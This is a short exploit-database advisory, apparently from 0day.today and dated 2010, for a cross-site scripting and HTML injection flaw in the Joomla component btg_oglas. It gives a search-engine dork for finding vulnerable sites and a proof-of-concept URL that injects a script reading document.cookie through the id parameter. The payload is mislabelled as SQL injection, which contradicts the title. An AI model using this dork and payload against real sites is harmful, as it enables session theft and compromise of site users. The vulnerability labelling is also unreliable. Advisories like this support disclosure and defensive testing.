id: 14777
date: 11/10/2010
title: Joomla Component btg_oglas HTML & XSS Injection Vulnerability
author: CoBRa_21
cves: 

=============================================================
Joomla Component btg_oglas HTML & XSS Injection Vulnerability
=============================================================

################################################################################################################
Author : CoBRa_21
Dork : inurl:btg_oglas
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=btg_oglas&id=<script>alert(document.cookie)</script>
################################################################################################################



#  0day.today [2023-03-25]  #